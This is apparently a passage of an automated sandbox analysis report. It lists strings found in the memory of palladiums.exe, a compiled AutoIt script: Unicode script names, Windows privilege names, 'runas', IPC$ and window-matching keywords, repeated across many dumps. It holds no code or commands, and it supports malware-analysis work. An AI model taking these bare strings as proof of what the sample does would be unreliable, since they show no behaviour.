                Source: palladiums.exe, 0000000C.00000002.2178106857.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b96ab8a1-8
                Source: palladiums.exe, 0000000E.00000000.2177422059.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_18e5bf16-a
                Source: palladiums.exe, 0000000E.00000000.2177422059.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_90805678-4
                Source: palladiums.exe, 0000000F.00000000.2190138381.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3e02dd09-0
                Source: palladiums.exe, 0000000F.00000000.2190138381.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4b108490-f
                Source: palladiums.exe, 00000010.00000002.2209051242.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c97d2f46-8
                Source: palladiums.exe, 00000010.00000002.2209051242.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8f56ce2c-9
                Source: palladiums.exe, 00000011.00000000.2208121005.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9d84fdbe-d
                Source: palladiums.exe, 00000011.00000000.2208121005.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2997bd44-f
                Source: palladiums.exe, 00000012.00000002.2226806136.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_83812dfa-7
                Source: palladiums.exe, 00000012.00000002.2226806136.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_33141854-6
                Source: palladiums.exe, 00000013.00000000.2226181702.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_38f93c4f-b
                Source: palladiums.exe, 00000013.00000000.2226181702.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_62ac64be-a
                Source: palladiums.exe, 00000014.00000002.2244821779.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_028ed9f6-d
                Source: palladiums.exe, 00000014.00000002.2244821779.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_235475ec-2
                Source: palladiums.exe, 00000015.00000000.2243747181.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eb74d8bc-7
                Source: palladiums.exe, 00000015.00000000.2243747181.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c0c69f51-8
                Source: palladiums.exe, 00000016.00000000.2253734948.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1b97308a-3
                Source: palladiums.exe, 00000016.00000000.2253734948.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_805c58d5-a
                Source: palladiums.exe, 00000017.00000000.2262801517.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_03a0520d-5
                Source: palladiums.exe, 00000017.00000000.2262801517.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_21826b79-4
                Source: palladiums.exe, 00000018.00000002.2280329404.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_33bdf700-9
                Source: palladiums.exe, 00000018.00000002.2280329404.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1efd06ce-c
                Source: palladiums.exe, 00000019.00000000.2279710337.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b00d25ad-e
                Source: palladiums.exe, 00000019.00000000.2279710337.00000000000F2000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiP